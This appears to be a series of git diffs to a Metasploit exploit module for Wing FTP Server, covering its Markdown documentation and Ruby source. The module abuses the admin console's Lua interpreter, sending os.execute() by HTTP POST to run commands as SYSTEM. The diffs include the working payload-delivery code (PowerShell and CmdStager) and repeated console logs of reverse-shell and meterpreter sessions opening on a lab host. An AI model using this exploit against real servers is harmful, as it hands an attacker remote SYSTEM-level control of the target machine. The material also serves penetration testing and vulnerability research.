+                                 [01]: 192.168.136.151
+                                 [02]: fe80::8cb0:9bf1:fefe:5fbd
+                           [02]: Microsoft KM-TEST Loopback Adapter
+                                 Connection Name: Npcap Loopback Adapter
+                                 Status:          Hardware not present
+<... snip ...>
 ```

--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -2,9 +2,9 @@
 
 This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above of Wing FTP Server. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
 
-Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 most probably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
+Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
 
-Version 6.0.2 handles URL encoding differently compared to version 4.3.8. This makes CmdStager fail (as it contains characters that cannot simply be base64 encoded, unlike PowerShell), so the use CmdStager against version 6.0.2 is strongly discouraged. Run `check` first before exploiting.
+Version 6.0.2 handles URL encoding differently compared to version 4.3.8. This makes CmdStager fail as it cannot simply be base64 encoded like PowerShell. It is recommended to run `check` first before exploiting to get a feel for the vulnerable app. The module has a built-in check to detect `PowerShell` first before continuing with the exploit. It will fall back to using `CmdStager` if `PowerShell` is absent. It does so by calling os.getenv() to get environment variables, then searching for `PowerShell`.
 
 The full changelog for Wing FTP Server can be found at [https://www.wftpserver.com/serverhistory.htm].
 
@@ -12,289 +12,24 @@ Information about the admin web interface can be found at [https://www.wftpserve
 
 ## Vulnerable application ##
 
-3.0.0 <= Wing FTP Server Version <= 6.0.2
+All versions of Wing FTP Server from 3.0.0 and up are vulnerable.
+
+Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:
+
+- Wing FTP Server 4.3.8
+- Wing FTP Server 6.0.2
+
+Original module has been tested on Windows 7 SP1 and Windows 8.1 with the following versions:
+
+- Wing FTP Server 4.3.6
+- Wing FTP Server 4.3.8
 
 ## Verification Steps ##
 
-1. Start `msfconsole`
-2. Do `use exploit/windows/ftp/wing_ftp_admin_exec`
-3. Do `set RHOST <target-ip>`
-4. Do `set USERNAME <valid-username>`
-5. Do `set PASSWORD <valid-password>`
-6. Optional: Do `set PAYLOAD windows/<your-preferred-shell>` (default is `windows/meterpreter/reverse_tcp`)
-7. Do `set LHOST <your-ip>`
-8. Optional: Do `set TARGET <target>` to specify whether PowerShell/CmdStager will be used (default and recommended is `PowerShell`)
-9. Do `exploit`
-10. Verify that a shell of your specified type (Meterpreter, plain old shell, etc.) pops
-
-## Tested with Wing FTP Server 4.3.8 and 6.0.2, installed on Windows Server 2016 Datacenter x64 ##
-
-### With PowerShell using x64 meterpreter against version 6.0.2 ###
-
-```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
-RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
-USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
-PASSWORD => password
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/shell_reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
-LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
-
-[*] Started reverse TCP handler on 192.168.136.146:4444 
-[*] Authenticating...
-[+] Wing FTP Server 6.0.2: appears vulnerable.
-[*] Executing payload via Powershell...
-[*] Sending stage (206403 bytes) to 192.168.136.151
-[*] Meterpreter session 6 opened (192.168.136.146:4444 -> 192.168.136.151:1879) at 2018-12-10 01:44:40 +0800
-
-meterpreter > sysinfo
-Computer        : 2K16DTCTR
-OS              : Windows 2016 (Build 14393).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 1
-Meterpreter     : x64/windows
-meterpreter > 
-```
-
-### with PowerShell using x86 shell_reverse_tcp against version 6.0.2 ###
-
-```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
-RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
-USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
-PASSWORD => password
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
-PAYLOAD => windows/shell_reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
-LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
-
-[*] Started reverse TCP handler on 192.168.136.146:4444 
-[*] Authenticating...
-[+] Wing FTP Server 6.0.2: appears vulnerable.
-[*] Executing payload via Powershell...
-[*] Command shell session 7 opened (192.168.136.146:4444 -> 192.168.136.151:1881) at 2018-12-10 01:45:18 +0800
-
-
-
-C:\Windows\system32>whoami & hostname & systeminfo
-whoami & hostname & systeminfo
-nt authority\system
-2K16DTCTR
-
-Host Name:                 2K16DTCTR
-OS Name:                   Microsoft Windows Server 2016 Datacenter
-OS Version:                10.0.14393 N/A Build 14393
-OS Manufacturer:           Microsoft Corporation
-OS Configuration:          Standalone Server
-OS Build Type:             Multiprocessor Free
-<... snip ...>
-Network Card(s):           2 NIC(s) Installed.
-                           [01]: Intel(R) 82574L Gigabit Network Connection
-                                 Connection Name: Ethernet0
-                                 DHCP Enabled:    Yes
-                                 DHCP Server:     192.168.136.254
-                                 IP address(es)
-                                 [01]: 192.168.136.151
-                                 [02]: fe80::8cb0:9bf1:fefe:5fbd
-                           [02]: Microsoft KM-TEST Loopback Adapter
-                                 Connection Name: Npcap Loopback Adapter
-                                 Status:          Hardware not present
-<... snip ...>
-```
-### with PowerShell using x64 meterpreter against version 4.3.8 ###
-
-```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
-RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
-USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
-PASSWORD => password
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/shell_reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
-LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
-
-[*] Started reverse TCP handler on 192.168.136.146:4444 
-[*] Authenticating...
-[+] Wing FTP Server 4.3.8: appears vulnerable.
-[*] Executing payload via Powershell...
-[*] Sending stage (206403 bytes) to 192.168.136.151
-[*] Meterpreter session 8 opened (192.168.136.146:4444 -> 192.168.136.151:1886) at 2018-12-10 01:47:06 +0800
-
-meterpreter > sysinfo
-Computer        : 2K16DTCTR
-OS              : Windows 2016 (Build 14393).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 1
-Meterpreter     : x64/windows
-meterpreter > 
-```
-
-### with PowerShell using x86 shell_reverse_tcp against version 4.3.8 ###
-
-```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
-RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
-USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
-PASSWORD => password
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
-PAYLOAD => windows/shell_reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
-LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
-
-[*] Started reverse TCP handler on 192.168.136.146:4444 
-[*] Authenticating...
-[+] Wing FTP Server 4.3.8: appears vulnerable.
-[*] Executing payload via Powershell...
-[*] Command shell session 9 opened (192.168.136.146:4444 -> 192.168.136.151:1889) at 2018-12-10 01:48:02 +0800
-
-
-
-C:\Windows\system32>whoami & hostname & systeminfo
-whoami & hostname & systeminfo
-nt authority\system
-2K16DTCTR
-
-Host Name:                 2K16DTCTR
-OS Name:                   Microsoft Windows Server 2016 Datacenter
-OS Version:                10.0.14393 N/A Build 14393
-OS Manufacturer:           Microsoft Corporation
-OS Configuration:          Standalone Server
-OS Build Type:             Multiprocessor Free
-<... snip ...>
-Network Card(s):           2 NIC(s) Installed.
-                           [01]: Intel(R) 82574L Gigabit Network Connection
-                                 Connection Name: Ethernet0
-                                 DHCP Enabled:    Yes
-                                 DHCP Server:     192.168.136.254
-                                 IP address(es)
-                                 [01]: 192.168.136.151
-                                 [02]: fe80::8cb0:9bf1:fefe:5fbd
-                           [02]: Microsoft KM-TEST Loopback Adapter
-                                 Connection Name: Npcap Loopback Adapter
-                                 Status:          Hardware not present
-<... snip ...>
-```
-
-### with CmdStager using x64 meterpreter against version 4.3.8 ###
-
-```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
-RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
-USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
-PASSWORD => password
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
-LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set TARGET CmdStager 
-TARGET => CmdStager
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
-
-[*] Started reverse TCP handler on 192.168.136.146:4444 
-[*] Authenticating...
-[+] Wing FTP Server 4.3.8: appears vulnerable.
-[*] Sending payload
-[*] Command Stager progress -  12.42% done (1499/12068 bytes)
-[*] Command Stager progress -  24.84% done (2998/12068 bytes)
-[*] Command Stager progress -  37.26% done (4497/12068 bytes)
-[*] Command Stager progress -  49.69% done (5996/12068 bytes)
-[*] Command Stager progress -  62.11% done (7495/12068 bytes)
-[*] Command Stager progress -  74.53% done (8994/12068 bytes)
-[*] Command Stager progress -  86.53% done (10442/12068 bytes)
-[*] Command Stager progress -  98.75% done (11917/12068 bytes)
-[*] Sending stage (206403 bytes) to 192.168.136.151
-[*] Command Stager progress - 100.00% done (12068/12068 bytes)
-[*] Meterpreter session 10 opened (192.168.136.146:4444 -> 192.168.136.151:1893) at 2018-12-10 01:49:32 +0800
-
-meterpreter > sysinfo
-Computer        : 2K16DTCTR
-OS              : Windows 2016 (Build 14393).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 1
-Meterpreter     : x64/windows
-meterpreter > 
-```
-
-### With CmdStager using x86 shell_reverse_tcp against version 4.3.8 ###
-
-```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
-RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
-USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
-PASSWORD => password
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
-PAYLOAD => windows/shell_reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
-LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set TARGET CmdStager 
-TARGET => CmdStager
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
-
-[*] Started reverse TCP handler on 192.168.136.146:4444 
-[*] Authenticating...
-[+] Wing FTP Server 4.3.8: appears vulnerable.
-[*] Sending payload
-[*] Command Stager progress -   1.47% done (1499/102292 bytes)
-[*] Command Stager progress -   2.93% done (2998/102292 bytes)
-[*] Command Stager progress -   4.40% done (4497/102292 bytes)
-<... snip ...>
-[*] Command Stager progress -  99.55% done (101827/102292 bytes)
-[*] Command Stager progress - 100.00% done (102292/102292 bytes)
-[*] Command shell session 11 opened (192.168.136.146:4444 -> 192.168.136.151:1897) at 2018-12-10 01:50:56 +0800
-
-
-
-C:\Windows\system32>whoami & hostname & systeminfo
-whoami & hostname & systeminfo
-nt authority\system
-2K16DTCTR
-
-Host Name:                 2K16DTCTR
-OS Name:                   Microsoft Windows Server 2016 Datacenter
-OS Version:                10.0.14393 N/A Build 14393
-OS Manufacturer:           Microsoft Corporation
-OS Configuration:          Standalone Server
-OS Build Type:             Multiprocessor Free
-<... snip ...>
-Network Card(s):           2 NIC(s) Installed.
-                           [01]: Intel(R) 82574L Gigabit Network Connection
-                                 Connection Name: Ethernet0
-                                 DHCP Enabled:    Yes
-                                 DHCP Server:     192.168.136.254
-                                 IP address(es)
-                                 [01]: 192.168.136.151
-                                 [02]: fe80::8cb0:9bf1:fefe:5fbd
-                           [02]: Microsoft KM-TEST Loopback Adapter
-                                 Connection Name: Npcap Loopback Adapter
-                                 Status:          Hardware not present
-<... snip ...>
-```
+- [x] Start `msfconsole`
+- [x] `use exploit/windows/ftp/wing_ftp_admin_exec`
+- [x] `set RHOST <target-ip>`
+- [x] `set USERNAME <valid-username>`
+- [x] `set PASSWORD <valid-password>`
+- [x] `exploit`
+- [x] **Verify** that you get a shell

--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -1,0 +1,217 @@
+## Description
+
+This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
+
+## Vulnerable application
+
+Wing FTP Server <= 4.3.8
+
+## Verification Steps
+    1. Start `msfconsole`
+    2. Do `use exploit/windows/ftp/wing_ftp_admin_exec`
+    3. Do `set RHOST <target-ip>`
+    4. Do `set USERNAME <valid-username>`
+    5. Do `set PASSWORD <valid-password>`
+    6. Optional: Do `set PAYLOAD windows/<your-preferred-shell>` (default is `windows\meterpreter\reverse_tcp`)
+    7. Do `set LHOST <your-ip>`
+    8. Optional: Do `set TARGET <target>` to specify whether PowerShell/CmdStager will be used (default is `PowerShell`)
+    9. Do `exploit`
+    10. Verify that a shell of your specified type (Meterpreter, plain old shell, etc.) pops
+
+## Tested with Wing FTP Server 4.3.8 on Windows Server 2016 Datacenter x64
+
+### With PowerShell using x64/meterpreter ###
+```
+msf > use exploit/windows/ftp/wing_ftp_admin_exec 
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+RHOST => 192.168.136.151
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
+PASSWORD => 5up3r53kr3tp@$$w0rd
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+LHOST => 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.136.146:4444 
+[*] Authenticating...
+[*] Executing payload via Powershell...
+[*] Sending stage (206403 bytes) to 192.168.136.151
+[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:1616) at 2018-12-07 02:43:10 +0800
+
+meterpreter > sysinfo
+Computer        : 2K16DTCTR
+OS              : Windows 2016 (Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### with PowerShell using shell_reverse_tcp ###
+
+
+```
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+RHOST => 192.168.136.151
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
+PASSWORD => 5up3r53kr3tp@$$w0rd
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
+PAYLOAD => windows/shell_reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+LHOST => 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.136.146:4444 
+[*] Authenticating...
+[*] Executing payload via Powershell...
+[*] Command shell session 2 opened (192.168.136.146:4444 -> 192.168.136.151:1623) at 2018-12-07 02:45:32 +0800
+
+
+C:\Windows\system32>whoami & hostname & ipconfig
+whoami & hostname & ipconfig
+nt authority\system
+2K16DTCTR
+
+Windows IP Configuration
+
+
+Ethernet adapter Ethernet0:
+
+   Connection-specific DNS Suffix  . : localdomain
+   Link-local IPv6 Address . . . . . : fe80::8cb0:9bf1:fefe:5fbd%14
+   IPv4 Address. . . . . . . . . . . : 192.168.136.151
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+   Default Gateway . . . . . . . . . : 192.168.136.2
+
+Tunnel adapter Teredo Tunneling Pseudo-Interface:
+
+   Connection-specific DNS Suffix  . : 
+   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6abd:ced:1cd7:3f57:7768
+   Link-local IPv6 Address . . . . . : fe80::ced:1cd7:3f57:7768%18
+   Default Gateway . . . . . . . . . : ::
+
+Tunnel adapter isatap.localdomain:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : localdomain
+
+C:\Windows\system32>
+
+```
+
+### with CmdStager using x64/meterpreter ###
+
+```
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+RHOST => 192.168.136.151
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
+PASSWORD => 5up3r53kr3tp@$$w0rd
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+LHOST => 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set TARGET CmdStager 
+TARGET => CmdStager
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.136.146:4444 
+[*] Authenticating...
+[*] Sending payload
+[*] Command Stager progress -  12.42% done (1499/12068 bytes)
+[*] Command Stager progress -  24.84% done (2998/12068 bytes)
+[*] Command Stager progress -  37.26% done (4497/12068 bytes)
+[*] Command Stager progress -  49.69% done (5996/12068 bytes)
+[*] Command Stager progress -  62.11% done (7495/12068 bytes)
+[*] Command Stager progress -  74.53% done (8994/12068 bytes)
+[*] Command Stager progress -  86.53% done (10442/12068 bytes)
+[*] Command Stager progress -  98.75% done (11917/12068 bytes)
+[*] Sending stage (206403 bytes) to 192.168.136.151
+[*] Command Stager progress - 100.00% done (12068/12068 bytes)
+[*] Meterpreter session 3 opened (192.168.136.146:4444 -> 192.168.136.151:1631) at 2018-12-07 02:49:01 +0800
+
+meterpreter > sysinfo
+Computer        : 2K16DTCTR
+OS              : Windows 2016 (Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### With CmdStager using shell_reverse_tcp ###
+
+```
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+RHOST => 192.168.136.151
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
+PASSWORD => 5up3r53kr3tp@$$w0rd
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
+PAYLOAD => windows/shell_reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+LHOST => 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set TARGET CmdStager 
+TARGET => CmdStager
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.136.146:4444 
+[*] Authenticating...
+[*] Sending payload
+[*] Command Stager progress -   1.47% done (1499/102292 bytes)
+[*] Command Stager progress -   2.93% done (2998/102292 bytes)
+[*] Command Stager progress -   4.40% done (4497/102292 bytes)
+[*] Command Stager progress -   5.86% done (5996/102292 bytes)
+[*] Command Stager progress -   7.33% done (7495/102292 bytes)
+[*] Command Stager progress -   8.79% done (8994/102292 bytes)
+[*] Command Stager progress -  10.26% done (10493/102292 bytes)
+<... snip ...>
+[*] Command Stager progress -  99.55% done (101827/102292 bytes)
+[*] Command Stager progress - 100.00% done (102292/102292 bytes)
+[*] Command shell session 4 opened (192.168.136.146:4444 -> 192.168.136.151:1639) at 2018-12-07 02:52:10 +0800
+
+
+C:\Windows\system32>whoami & hostname & ipconfig
+whoami & hostname & ipconfig
+nt authority\system
+2K16DTCTR
+
+Windows IP Configuration
+
+
+Ethernet adapter Ethernet0:
+
+   Connection-specific DNS Suffix  . : localdomain
+   Link-local IPv6 Address . . . . . : fe80::8cb0:9bf1:fefe:5fbd%14
+   IPv4 Address. . . . . . . . . . . : 192.168.136.151
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+   Default Gateway . . . . . . . . . : 192.168.136.2
+
+Tunnel adapter Teredo Tunneling Pseudo-Interface:
+
+   Connection-specific DNS Suffix  . : 
+   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6abd:ced:1cd7:3f57:7768
+   Link-local IPv6 Address . . . . . : fe80::ced:1cd7:3f57:7768%18
+   Default Gateway . . . . . . . . . : ::
+
+Tunnel adapter isatap.localdomain:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : localdomain
+
+C:\Windows\system32>
+```

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'http://www.wftpserver.com']
+          ['URL', 'http://www.wftpserver.com'],
+          ['Admin Console Info', 'https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm']
         ],
       'Arch'           => ARCH_X86,
       'Platform'       => 'win',
@@ -55,7 +56,10 @@ class MetasploitModule < Msf::Exploit::Remote
   @session_cookie = ''
 
   def check
-    authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    if @session_cookie.nil?
+      return CheckCode::Unknown
+    end
 
     ver = send_request_cgi(
       'uri'       => '/admin_license.html',
@@ -63,18 +67,25 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie'    => @session_cookie
     )
 
-    if ver.code != 200
-      return Exploit::CheckCode::Unknown
-    elsif ver.get_html_document.text.to_s.include? "Wing FTP Server"
-      version = ver.get_html_document.at('span').text.to_s
-      vprint_status "Found #{version}"
-      if version[/([0-4]\.[0-3]\.[0-8])/]
-        print_good("#{version} appears vulnerable.")
-        return Exploit::CheckCode::Appears
-      end
-
-      return Exploit::CheckCode::Safe
+    unless ver
+      vprint_error "Connection failed!"
+      return CheckCode::Unknown
     end
+
+    unless ver.code == 200 && ver.get_html_document.text.to_s.include?('Wing FTP Server')
+      return CheckCode::Safe
+    end
+
+    version = ver.get_html_document.at('span').text.to_s
+    vprint_status "Found #{version}"
+
+    # LUA capabilities and administrator console were added in version 3.0.0
+    if version[/([3-4]\.[0-3]\.[0-8])/]
+      print_good("#{version} appears vulnerable.")
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
   end
 
   def exploit
@@ -125,16 +136,23 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    if !res
-      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
-    elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
+    unless res
+      print_error("#{peer} - Admin login page was unreachable.")
+      return nil
+    end
+
+    if res.code == 200 && res.body =~ /location='main.html\?lang=english';/
       res.get_cookies.split(';').each do |cookie|
         cookie.split(',').each do |value|
-          @session_cookie = value.to_s if value.split('=')[0] =~ /UIDADMIN/
+          if value.split('=')[0] =~ /UIDADMIN/
+            vprint_status("Authentication successful, got session cookie #{value.split('=')[1]}")
+            return value.to_s
+          end
         end
       end
-    else
-      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
+
+    print_error("#{peer} - Authentication failed")
+    return nil
   end
 end

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -74,12 +74,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'     => 'text/plain;charset=UTF-8'
     )
 
-    unless ver # cannot connect
+    unless ver
       vprint_error("Connection failed!")
       return CheckCode::Unknown
     end
 
-    unless ver.code == 200 && ver.get_html_document.text.to_s.include?('Wing FTP Server') # does not contain Wing FTP Server
+    unless ver.code == 200 && ver.body.include?('Wing FTP Server')
       return CheckCode::Safe
     end
 
@@ -87,33 +87,27 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Found Wing FTP Server #{@version}")
 
     # Lua capabilities and administrator console were added in version 3.0.0, so everything above that is vulnerable
-    if @version >= Gem::Version.new('3.0.0')
-
-      @vuln_check = true
-      vuln_or_not = execute_command("PATH") # get PATH variables using os.getenv() in Lua
-
-      unless vuln_or_not # cannot connect
-        vprint_error("Connection failed!")
-        return CheckCode::Unknown
-      end
-
-      unless !vuln_or_not.code == 200 && !vuln_or_not.get_html_document.text.to_s.include?("System32") # includes 'System32' in response
-        if vuln_or_not.body.include?("PowerShell") # also includes 'Powershell' in response
-          @psh = true
-        else
-          @psh = false
-        end
-
-        @vuln_check = false
-        return CheckCode::Vulnerable
-      end
-
+    unless @version >= Gem::Version.new('3.0.0')
       @vuln_check = false
       return CheckCode::Safe
     end
 
+    @vuln_check = true
+    winenv_path = execute_command("PATH")
+
+    unless winenv_path
+      vprint_error("Connection failed!")
+      return CheckCode::Unknown
+    end
+
+    if winenv_path.code == 200 && winenv_path.body.include?('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\')
+      @psh = true
+    else
+      @psh = false
+    end
+
     @vuln_check = false
-    return CheckCode::Safe
+    return CheckCode::Vulnerable
   end
 
   def exploit
@@ -122,21 +116,16 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
     end
 
-    case @psh
-    when true
+    if @psh == true
       print_status('Executing payload via PowerShell...')
-      # cmd is sent URL-encoded. Version 6.0.2 does not URL decode characters, and this causes exploit to fail.
-      # Completely encode PowerShell cmd with base64 to subvert this.
       psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
       execute_command(psh_command)
-    when false
+    else
       if @version >= Gem::Version.new('6.0.2')
-        print_warning("Version #{@version} detected, expect CmdStager to fail!") # CmdStager fails vs. 6.0.2
+        print_warning("Version #{@version} detected, expect CmdStager to fail!")
       end
       print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
       print_status("Sending payload")
-      # Unfortunately, CmdStager still suffers from the "no URL decode" of version 6.0.2.
-      # Recommended: don't use CmdStager versus 6.0.2.
       # Execute the CmdStager, max length of the commands is ~1500
       execute_cmdstager(flavor: :vbs, linemax: 1500)
     end
@@ -144,11 +133,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd,_opts = {})
     # Wrap cmd it with [[ ]] to prevent potential problems.
-    # We also don't need to append "cmd.exe /c" for the commands
-    if @vuln_check == false
-      command = "os.execute([[#{cmd}]])"
+    if @vuln_check == true
+      command = "print(os.getenv([[#{cmd}]]))"
     else
-      command = "print(os.getenv([[#{cmd}]]))" # PATH is a good env. variable to get
+      command = "os.execute([[#{cmd}]])"
     end
 
     res = send_request_cgi(
@@ -159,11 +147,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => { 'command' => command }
     )
 
-    if res && res.code != 200
+    unless res && res.code == 200
       fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
     end
 
-    unless @vuln_check == false
+    if @vuln_check
       return res
     end
   end

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
